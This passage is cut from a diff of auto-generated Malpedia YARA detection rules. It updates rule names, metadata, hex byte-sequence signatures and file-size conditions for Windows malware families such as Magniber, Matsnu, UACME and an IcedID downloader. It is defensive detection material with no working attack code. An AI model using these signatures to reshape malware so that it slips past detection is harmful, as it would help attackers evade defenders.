+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nightdoor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "f37966362a7b1531336f0a212f7c22ad8f69248a7c762c12dc2134fd4316ec00"
+		logic_hash = "b8f0be07bb7b1289cbb83b32643a32575a68c3484dc281ff533188505409d208"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106572,32 +106795,32 @@ rule MALPEDIA_Win_Allaple_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c2 c1f803 8b4d08 33d2 8a1401 8b45f4 25ff000000 }
-		$sequence_1 = { e8???????? 83c40c 8d45f8 50 8d85a0fdffff 50 ff75fc }
-		$sequence_2 = { 03d1 8955f8 8b45fc 83c001 8945fc 8b4df0 034dec }
-		$sequence_3 = { ff75fc 8d4df0 51 e8???????? 83c408 8d8578ffffff 50 }
-		$sequence_4 = { 8b55f4 33d1 0355b0 8b45fc 8d8c10442229f4 894dfc 8b55fc }
-		$sequence_5 = { 55 8bec 8b5510 8b4d0c 8b4108 }
-		$sequence_6 = { 56 57 8b5d08 8b5b04 c7432c00000000 5f }
-		$sequence_7 = { 894821 8b450c 5f 5e 8be5 5d c20c00 }
-		$sequence_8 = { 33ff 683f000f00 57 57 ff15???????? 8bd8 3bc7 }
-		$sequence_9 = { 8b4208 33852cffffff 3345cc 8945e4 8b4d08 8b510c }
+		$sequence_0 = { 8bec 57 8b7d08 85ff 7423 8b4774 c6476001 }
+		$sequence_1 = { c745fc00000000 8b45e4 c70000040000 8b4de4 8b11 52 e8???????? }
+		$sequence_2 = { c7430404000000 8b7068 6a08 e8???????? 8bf8 83c40c 85ff }
+		$sequence_3 = { 50 8d45f4 64a300000000 8bf9 8bce 897db4 c745b000000000 }
+		$sequence_4 = { 8d7708 53 8d85e0feffff 897704 e8???????? 8bd8 83c410 }
+		$sequence_5 = { 8d460c 8d4ff4 8945fc 83c40c 33c0 85c9 742b }
+		$sequence_6 = { c645fc01 33db e8???????? 85c0 7468 68???????? 57 }
+		$sequence_7 = { 8b8538feffff 50 e8???????? 59 c3 8d4dc0 }
+		$sequence_8 = { 52 8b55ec 52 50 e8???????? 8b7e04 8b0e }
+		$sequence_9 = { 8d55b8 52 e8???????? 898538ffffff 8b8d3cffffff e8???????? 8d8d4cffffff }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 1124352
 }
-rule MALPEDIA_Win_Joao_Auto : FILE
+rule MALPEDIA_Win_Magniber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c5eae5c-6b71-5c2d-8653-d15d55163143"
+		id = "7fac4144-b4d1-566a-b639-19fbbfbfa437"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.joao_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magniber_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "a16bd14cef032c190157889a218a60983ef70bb2ccc40760ffd00615dd49093e"
+		logic_hash = "f96a42bc667d201d8cee5f819105f9eb43cfe17ca799b1fa9b8dd76d6755feb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106611,99 +106834,38 @@ rule MALPEDIA_Win_Joao_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 68b0000000 b9???????? e8???????? }
-		$sequence_1 = { 833f10 720e 8b03 50 e8???????? 8b4510 }
-		$sequence_2 = { 741c 8b0f 8908 8d4804 83c704 }
-		$sequence_3 = { 40 50 8d4ef0 51 53 e8???????? }
-		$sequence_4 = { e8???????? 83c404 897e14 897e18 897e1c 8b4604 }
-		$sequence_5 = { c745d000000000 85c9 746f 8b4320 03c6 8945cc }
-		$sequence_6 = { 837de810 8b45d4 7303 8d45d4 52 51 50 }
-		$sequence_7 = { 52 8d4dd0 e8???????? 83f8ff 740b 6aff 50 }
-		$sequence_8 = { 3bd1 7299 837de810 720c }
-		$sequence_9 = { 52 8bce c745f802000000 897dfc e8???????? }
-
-	condition:
-		7 of them and filesize < 2867200
-}
-rule MALPEDIA_Win_9002_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9aa2661d-b448-5e86-992b-d0dd1273bcc5"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.9002_auto.yar#L1-L343"
-		license_url = "N/A"
-		logic_hash = "a9799983d6a402fa0d92d4f2eccaf317bd81e0e8019f92bfd3f7e50ba619a3a3"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 8bc2 2d00040000 f7d8 1bc0 }
-		$sequence_1 = { 33c9 894808 894810 8910 c7400c01000000 894814 }
-		$sequence_2 = { 56 89442418 ff15???????? a820 }
-		$sequence_3 = { e8???????? 83c408 894604 03c5 }
-		$sequence_4 = { eb04 2bc8 8be9 53 50 }
-		$sequence_5 = { 8b460c 40 33d2 f77614 ff4610 }
-		$sequence_6 = { ff15???????? 81c600040000 50 56 ff15???????? }
-		$sequence_7 = { 8b5d0c 6bdb08 03c3 8b00 }
-		$sequence_8 = { 6a02 6a03 6a00 e8???????? }
-		$sequence_9 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 6a00 6a00 }
-		$sequence_10 = { 68???????? ff15???????? 6a0a ff15???????? e9???????? }
-		$sequence_11 = { 8bf1 50 6801020000 c706???????? e8???????? }
-		$sequence_12 = { e8???????? 50 e8???????? 6a08 e8???????? }
-		$sequence_13 = { 7504 33d2 eb05 8b5608 2bd0 3bfa }
-		$sequence_14 = { 83b98c00000002 7504 33c9 eb03 8b4914 }
-		$sequence_15 = { 33c9 3bc8 1bd2 f7da 8915???????? }
-		$sequence_16 = { 894814 89481c c20400 56 8bf1 }
-		$sequence_17 = { 03c3 8b00 5b ffd0 }
-		$sequence_18 = { 80e108 0ac8 80c910 880e 8ac2 }
-		$sequence_19 = { 51 e8???????? 6a06 6a01 6a02 e8???????? }
-		$sequence_20 = { 8806 46 c1ea06 8816 46 }
-		$sequence_21 = { 8b01 ff5010 8b7614 ff4e0c 5e }
-		$sequence_22 = { 742e 85f6 7419 0fb6da f683c1d4001004 7406 8816 }
-		$sequence_23 = { 64a300000000 8bf9 8d7708 8bce }
-		$sequence_24 = { e8???????? 83c43c c21000 56 e8???????? }
-		$sequence_25 = { 6689bc5a80010000 83c30c 895c2424 e9???????? }
-		$sequence_26 = { 8d4c240c 8d542418 6a05 8944241c 51 }
-		$sequence_27 = { ff15???????? 8bc6 8b4c2434 64890d00000000 59 5f }
-		$sequence_28 = { 03c2 eb02 33c0 85ff }
-		$sequence_29 = { 8bf8 6a40 6800100000 57 6a00 ff15???????? 8d4df8 }
-		$sequence_30 = { c7470400000000 2504400080 5f 40 5e c3 5f }
-		$sequence_31 = { 7622 8b4558 83f805 7316 8a0b }
-		$sequence_32 = { 8b5c247c 55 56 8bb4248c000000 57 8b3b 8b2e }
-		$sequence_33 = { ff15???????? 015e18 57 83561c00 ff15???????? 5b }
-		$sequence_34 = { 8bf1 e8???????? 8be8 83c608 8bce }
-		$sequence_35 = { c3 b8???????? c705????????772b0010 a3???????? }
-		$sequence_36 = { ff15???????? 8bf8 6a40 6800100000 }
-		$sequence_37 = { 7548 8b4e0c 394f0c 7540 8b5748 807f040a }
+		$sequence_0 = { c7420c00400000 eb0a 8b45fc c7400c00800000 8b4dfc c70100000000 }
+		$sequence_1 = { ff15???????? eb2e 837df803 7528 8d4da0 51 }
+		$sequence_2 = { 52 8b4508 05e0020000 50 8b4d08 }
+		$sequence_3 = { 66894dc2 ba31000000 668955c4 b835000000 668945c6 b920000000 }
+		$sequence_4 = { c785f8fdffff409b4000 c785fcfdffff489b4000 c78500feffff509b4000 c78504feffff589b4000 c78508feffff609b4000 c7850cfeffff689b4000 }
+		$sequence_5 = { c785d8fbffff90964000 c785dcfbffff98964000 c785e0fbffffa0964000 c785e4fbffffac964000 c785e8fbffffb8964000 c785ecfbffffc0964000 }
+		$sequence_6 = { 56 c745f000001000 c745c800000000 c745cc00000000 c745dc00000000 }
+		$sequence_7 = { c78590fbfffff0954000 c78594fbfffff8954000 c78598fbffff00964000 c7859cfbffff0c964000 c785a0fbffff14964000 c785a4fbffff1c964000 }
+		$sequence_8 = { f8 a6 6e d89bcb299b94 }
+		$sequence_9 = { d331 4e4e54 70ac 52 }
+		$sequence_10 = { 184026 e221 a1????????05eef081 e0f8 29aed0515fa6 }
+		$sequence_11 = { 18cb 52 fc 285f44 c1c70d 11fb }
+		$sequence_12 = { 5a b3b1 3e6c 21746c2e 4834b0 184026 e221 }
+		$sequence_13 = { f76e9f 32d8 2d7a350e78 95 }
+		$sequence_14 = { 29aed0515fa6 8d4f0e 7f4c c82cd1c6 1a32 b636 }
+		$sequence_15 = { e8???????? 32cb 5a b3b1 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Rumish_Auto : FILE
+rule MALPEDIA_Win_Matsnu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39ff2947-af25-5616-8af4-3255d7aff8f4"
+		id = "0f71c5ab-0c82-5153-bcd8-045c162f2f63"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rumish_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matsnu_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "a573540e20ab8e039d32cb674dc87b90cf57e8c3eeb462c1c864991bf4880267"
+		logic_hash = "95216433634cb314b9cc2cf8428b6a5d974607cd960d3ec0665086600fff0829"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106717,32 +106879,32 @@ rule MALPEDIA_Win_Rumish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 898554ffffff 83bd54ffffff00 0f85de000000 c7854cffffff00000000 eb0f 8b854cffffff 83c001 }
-		$sequence_1 = { dc35???????? dc0d???????? dc05???????? d97df6 0fb745f6 0d000c0000 }
-		$sequence_2 = { 8d4dd4 e8???????? 8b4db0 8908 8b55a0 3b55ec 7d27 }
-		$sequence_3 = { 7738 8b951cffffff ff24957cf54300 68???????? 8d4d94 e8???????? eb1c }
-		$sequence_4 = { 8d8d68ffffff e8???????? 8d8d60ffffff 51 8d8d68ffffff e8???????? 8b9558ffffff }
-		$sequence_5 = { 55 8bec 53 e8???????? b9???????? e8???????? }
-		$sequence_6 = { eb10 68???????? 8d8d4cffffff e8???????? e9???????? 0fbf458c 8985d0feffff }
-		$sequence_7 = { 83e10f c1e102 0fb655f5 81e2c0000000 c1fa06 0bca }
-		$sequence_8 = { 8b85c0fcffff 83c001 8985c0fcffff 8b8dc0fcffff 3b8df4fcffff 0f8de4000000 8b95c4fcffff }
-		$sequence_9 = { d918 8b8dc4feffff d901 dc1d???????? dfe0 f6c444 7b11 }
+		$sequence_0 = { 751d ff75ba ff7510 e8???????? 8945f6 }
+		$sequence_1 = { 2945ce ebd3 c745d600000000 c745da00010000 c745e200000000 }
+		$sequence_2 = { 8b45e6 8807 eb75 817dd6000f0000 }
+		$sequence_3 = { c1e004 8b7dfa 01c7 8b45de 8907 8b45e6 c1e004 }
+		$sequence_4 = { 8b75fa 01c6 8b36 0375ea 8b7d10 }
+		$sequence_5 = { 7402 eb14 8d75f9 56 }
+		$sequence_6 = { 8b450c 8985c0fbffff 50 ff7508 }
+		$sequence_7 = { 8a4e01 80e1f0 c0e904 08c8 8d55bc 01c2 8a02 }
+		$sequence_8 = { e8???????? 83f800 750f c785a4fbffff03000000 e9???????? }
+		$sequence_9 = { 55 89e5 81ec10020000 c785f0fdffff00000000 }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 606992
 }
-rule MALPEDIA_Win_Knight_Auto : FILE
+rule MALPEDIA_Win_Himera_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5e09115-4011-54e1-a2ba-c2bbb8ab355a"
+		id = "115dcecd-6236-578c-9832-50f71f100115"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.knight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.himera_loader_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "d7c3e295d686febfc6f312c8c39590a584a2b1ffbd1bc0f76a009284be0570bc"
+		logic_hash = "4b810ce6519155c850bedb77ed28ec3affe4b473b14342db1fd6830f8663ee07"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106756,34 +106918,34 @@ rule MALPEDIA_Win_Knight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4889842438040000 48895c2438 488d05b7dc2b00 e8???????? 488b4c2468 48894808 }
-		$sequence_1 = { c3 4889b4fa90100000 4c8984fa98100000 48ffc0 48398280100000 0f8e41020000 488d3440 }
-		$sequence_2 = { e8???????? 90 48badc5618b3c5c35016 48899424d0010000 48bac41447e86e4d2c6e 48899424d8010000 48ba681b6b8416537508 }
-		$sequence_3 = { eb11 488d7818 488b8c2490180000 e8???????? 488b8c24f8090000 48894808 833d????????00 }
-		$sequence_4 = { 90 e9???????? 4d89e0 e8???????? e9???????? 0fb6542447 488b4c2470 }
-		$sequence_5 = { e8???????? e9???????? 488b15???????? 83ba40010000ff 7524 488b942420010000 488d3452 }
-		$sequence_6 = { e8???????? 488b842460010000 e8???????? 48898c24f0000000 48897c2468 488b942418010000 488d7208 }
-		$sequence_7 = { 48badde48c2f452788e5 488954247e 48ba44246115b6572ab9 4889942486000000 31c0 e9???????? 48894c2450 }
-		$sequence_8 = { 48baa24a6d7998292bba 488954242b 48ba58053529bf406a5d 4889542433 31c0 eb14 0fb654043b }
-		$sequence_9 = { e8???????? 488d0542873200 bb14000000 6690 e8???????? 31c0 4889c1 }
+		$sequence_0 = { 8d8060964200 8945e4 803800 8bc8 }
+		$sequence_1 = { 895594 894db0 8b048d00a14200 8975b4 8b440618 8b7514 }
+		$sequence_2 = { 8b4df8 8b55f4 8b048d00a14200 807c102800 }
+		$sequence_3 = { 0f57c9 f20f2aca 0f57c0 f20f2ac1 c1e91f f20f590d???????? f20f5804cd606f4200 }
+		$sequence_4 = { 8d45f4 64a300000000 894de4 c745e008000000 c645e801 }
+		$sequence_5 = { c645e557 c645e65a c645e746 c645e841 }
+		$sequence_6 = { 6bf838 894df4 8b048d00a14200 c745f00a000000 8b540718 8955e0 }
+		$sequence_7 = { 8b55f0 8b048500a14200 807c022800 7da9 807dff02 }
+		$sequence_8 = { 8b404c 83b8a800000000 750e 8b04bd00a14200 807c302900 }
+		$sequence_9 = { 8b45fc 83c001 8945fc 837dfc12 7318 8b4d08 }
 
 	condition:
-		7 of them and filesize < 12149760
+		7 of them and filesize < 385024
 }
-rule MALPEDIA_Win_Prikormka_Auto : FILE
+rule MALPEDIA_Win_Scieron_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2164d528-1794-5deb-b46c-b3d81c69fad8"
+		id = "1a215415-1cbd-5509-a833-0e80720c59be"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prikormka_auto.yar#L1-L416"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scieron_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "6a6b4101990a4a459b0787e75e4b68bca1a92474214a272dc57d00cd454ce776"
+		logic_hash = "f3ffce1ac52929398289b6099b241833a19e91e706a019cc700fc14e11b03b2d"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106795,68 +106957,32 @@ rule MALPEDIA_Win_Prikormka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 }
-		$sequence_1 = { 8b2d???????? 85c0 7405 6a02 56 ffd5 }
-		$sequence_2 = { 8d1446 52 e8???????? 83c40c }
-		$sequence_3 = { 7420 68???????? ffd7 03c0 50 }
-		$sequence_4 = { e8???????? 8b1d???????? 83c40c 6a00 56 ffd3 }
-		$sequence_5 = { 6800020000 ff15???????? 68???????? ffd7 }
-		$sequence_6 = { 56 ffd3 85c0 7405 6a02 }
-		$sequence_7 = { 85c0 740e 68???????? 50 ff15???????? ffd0 }
-		$sequence_8 = { 6a00 ff15???????? 85c0 7502 59 }
-		$sequence_9 = { 7502 59 c3 50 ff15???????? }
-		$sequence_10 = { 7408 41 42 3bce }
-		$sequence_11 = { 83c40c 8d442404 50 ff15???????? 5e 85c0 }
-		$sequence_12 = { ff15???????? 0fb7c0 6683f805 7d09 b801000000 }
-		$sequence_13 = { c3 57 6a00 6a00 6a00 6a02 }
-		$sequence_14 = { 83ec08 68???????? ff15???????? 0fb7c0 }
-		$sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 }
-		$sequence_16 = { 5e 85c0 7414 c705????????01000000 }
-		$sequence_17 = { 3db7000000 750e 56 ff15???????? 33c0 5e }
-		$sequence_18 = { 6a00 6a00 ff15???????? 8bf0 ff15???????? 3db7000000 750e }
-		$sequence_19 = { 8b0d???????? 2bc2 8b15???????? d1f8 }
-		$sequence_20 = { 6685d2 75f5 2bce 8d1400 }
-		$sequence_21 = { 2bce 8d1400 52 d1f9 }
-		$sequence_22 = { d1f8 8d7102 8da42400000000 668b11 83c102 6685d2 }
-		$sequence_23 = { 8b35???????? 83c40c 68???????? ffd6 03c0 }
-		$sequence_24 = { 83c002 6685c9 75f5 2bc6 8d0c12 51 d1f8 }
-		$sequence_25 = { 50 e8???????? b8???????? 83c40c 8d5002 }
-		$sequence_26 = { 85c0 7409 6a02 68???????? }
-		$sequence_27 = { 83c40c 8d5002 668b08 83c002 6685c9 75f5 8b0d???????? }
-		$sequence_28 = { 75f5 2bc6 03d2 52 }
-		$sequence_29 = { 56 57 68???????? 33ff 57 57 ff15???????? }
-		$sequence_30 = { e8???????? 83c40c eb0d 6a00 6800020000 }
-		$sequence_31 = { 50 68???????? 57 ffd6 03c7 50 }
-		$sequence_32 = { 50 ff15???????? 0fb74c2416 0fb7542414 }
-		$sequence_33 = { 6685d2 75f5 8d1400 2bce 52 }
-		$sequence_34 = { 6685c9 75f5 2bc2 d1f8 8bd0 b8???????? }
-		$sequence_35 = { 6685c9 75f5 2bc2 b9???????? d1f8 8d7102 }
-		$sequence_36 = { b9???????? d1f8 8d7102 668b11 83c102 6685d2 75f5 }
-		$sequence_37 = { 8b3d???????? 85f6 7420 68???????? }
-		$sequence_38 = { b8???????? 8d7002 8da42400000000 668b08 83c002 }
-		$sequence_39 = { 8b1d???????? 83c40c 6a00 68???????? ffd3 8b3d???????? 85c0 }
-		$sequence_40 = { 52 ff7504 57 50 }
-		$sequence_41 = { 68???????? 57 ff16 8bf0 3bf3 0f8c5a020000 }
-		$sequence_42 = { 8bc6 5e c3 56 6a5c ff74240c }
-		$sequence_43 = { 395de8 7512 ff35???????? ff15???????? 891d???????? 8b4dfc 8b45e8 }
-		$sequence_44 = { 57 894594 894d98 3b450c 0f84ba000000 }
-		$sequence_45 = { c1e606 03348520100210 c745e401000000 33db 395e08 7536 }
+		$sequence_0 = { ff742418 ff15???????? 85c0 0f8472020000 f686????????10 7415 }
+		$sequence_1 = { ffd0 85f6 0f8497010000 6800800000 8d44242c }
+		$sequence_2 = { 6800000080 83c008 50 ff15???????? 8bf8 }
+		$sequence_3 = { 72f0 33c0 663b45f0 7560 8a45f4 8b4d08 }
+		$sequence_4 = { 3bfd 7507 33c0 e9???????? 8b742418 6a0c 57 }
+		$sequence_5 = { e8???????? 8bf8 83c410 3bfe 0f841bffffff }
+		$sequence_6 = { 0f8401010000 6a04 8d4c2410 51 }
+		$sequence_7 = { 8bf8 3bfe 7419 8d4574 50 57 }
+		$sequence_8 = { 033e 68???????? 68???????? ff15???????? 50 ff15???????? ffd0 }
+		$sequence_9 = { ff15???????? 50 ff15???????? ffd0 83c61c }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 100352
 }
-rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
+rule MALPEDIA_Win_Uacme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "faff812c-4777-587b-9604-c74c7f7c8370"
+		id = "ff7de611-297b-5087-b1a6-103aa95a4d6a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloud_duke_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.uacme_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c237687bdb3916be1afbb15c7aa4edc82ffc9e06f6334b5efe36ab376ab13130"
+		logic_hash = "07027ccb25725e405fe664bc8c5892aae7b19e4bf0683cd3f46495797cb60d93"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106870,32 +106996,32 @@ rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8844241b e9???????? 8bce b8???????? }
-		$sequence_1 = { 8d8c241c030000 8d5102 8d642400 668b01 83c102 6685c0 75f5 }
-		$sequence_2 = { 2bca 8b95dcfbffff d1f9 8d4202 8985e0fbffff 8bff 668b02 }
-		$sequence_3 = { 83c404 ff742424 e8???????? 8b44246c }
-		$sequence_4 = { 81e1ff000080 7908 49 81c900ffffff 41 880c3e 46 }
-		$sequence_5 = { 57 51 8d8c24e4000000 e8???????? 83c410 84c0 7437 }
-		$sequence_6 = { 42 8954242c 3b94243c010000 0f8cc7f4ffff 8b742424 e9???????? }
-		$sequence_7 = { 8b4e10 2bc1 83f801 0f868c000000 8d7901 }
-		$sequence_8 = { 6a3c 6a00 50 e8???????? 8d842428030000 }
-		$sequence_9 = { c7868c00000000000000 7711 c786f800000003000000 32c0 e9???????? 33c9 c78424d000000007000000 }
+		$sequence_0 = { ff15???????? 85c0 7515 834dfcff 56 8b7514 85f6 }
+		$sequence_1 = { 8d85fcfeffff 50 ff15???????? 8a85fcfeffff 8d95fcfeffff }
+		$sequence_2 = { 8d45a8 50 ff15???????? 8d45f0 50 }
+		$sequence_3 = { 56 ff15???????? 68???????? 6806600000 56 }
+		$sequence_4 = { 53 c744247030000000 c744247420000000 c744247897344000 895c247c 899c2480000000 89bc2484000000 }
+		$sequence_5 = { 50 57 ff15???????? 8d4c2428 }
+		$sequence_6 = { 750d ffd6 3db7000000 0f8567010000 ba???????? 8d8ddcfbffff e8???????? }
+		$sequence_7 = { 52 57 57 53 51 ff500c }
+		$sequence_8 = { 83f915 89742420 0f44c6 895c2414 a3???????? }
+		$sequence_9 = { 75f7 8b4dfc ba???????? 8d4930 e8???????? 8b4dfc ba???????? }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Fanny_Auto : FILE
+rule MALPEDIA_Win_Unidentified_078_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "636b5d30-80f3-5732-bf96-9c4782cd973d"
+		id = "64f36470-7870-5fa2-9ea9-c0ec36ad9821"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fanny_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_078_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "194cb9aecc835fe3bc3c50607cb7b5a60a928574c0136642094275d35cd55914"
+		logic_hash = "b2ccb25b85c44f5791ffc176375cf264c69c00ab695680a03b0c62f11e1990f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106909,40 +107035,34 @@ rule MALPEDIA_Win_Fanny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45d4 50 e8???????? 8945fc 8b4dfc }
-		$sequence_1 = { 8d4dd8 e8???????? 8b45b0 eb1a c745ac01000000 }
-		$sequence_2 = { 897c2410 56 e8???????? 8b442414 83c404 }
-		$sequence_3 = { 85c9 7615 8bd9 b801010101 8bfe }
-		$sequence_4 = { 50 ffd3 85c0 59 894604 }
-		$sequence_5 = { 5d c20800 55 8bec 81ec38020000 }
-		$sequence_6 = { ffd6 c645f863 bf00020000 807dfe28 0f838f000000 33db 57 }
-		$sequence_7 = { 8b7d00 8bf0 8bc1 c1e902 f3a5 8bc8 33c0 }
-		$sequence_8 = { 6a00 89450c 8d450c 50 ff75f8 53 }
-		$sequence_9 = { 83c414 85c0 7508 0fb745fc 85c0 7403 }
-		$sequence_10 = { 8d9e18020000 8d54240c 52 8d542418 }
-		$sequence_11 = { 53 56 57 8965e8 33db 895dc0 b907000000 }
-		$sequence_12 = { 7517 8b842418010000 8938 5f 5e 33c0 }
-		$sequence_13 = { 66894dc8 b906000000 33c0 8d7da8 f3ab c745a808000000 }
-		$sequence_14 = { c745bc00000000 8d4dec e8???????? 8d4dd8 e8???????? }
-		$sequence_15 = { ff33 ff15???????? 832300 59 8b45fc 5f 5e }
+		$sequence_0 = { 83fb11 743f 81fba2000000 7437 89da 83e2fd }
+		$sequence_1 = { 83fa15 760e 83eb5b 83fb01 0f8720010000 eb0f b901003b00 }
+		$sequence_2 = { e8???????? ebcb 56 53 }
+		$sequence_3 = { 80fa0c 0f8412010000 0f8cee000000 80fa0d 0f8421010000 80fa1b }
+		$sequence_4 = { 741b 80fa18 7431 eb6b }
+		$sequence_5 = { 7e2b 8a44010f 3c5c 7423 3c2f 741f }
+		$sequence_6 = { 7404 ffd0 ebc9 ffd0 }
+		$sequence_7 = { 80fa5c 0f84cb000000 80fa7e 0f8f02010000 e9???????? ba02000000 e8???????? }
+		$sequence_8 = { 7514 8a542e10 80fa5c 0f94c1 }
+		$sequence_9 = { 7437 89da 83e2fd 83fa10 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Purplefox_Auto : FILE
+rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0153672-5fee-5a98-93dd-cdb37613f00c"
+		id = "a6a24661-a781-5517-9bde-5f4ae21f58dc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purplefox_auto.yar#L1-L389"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader"
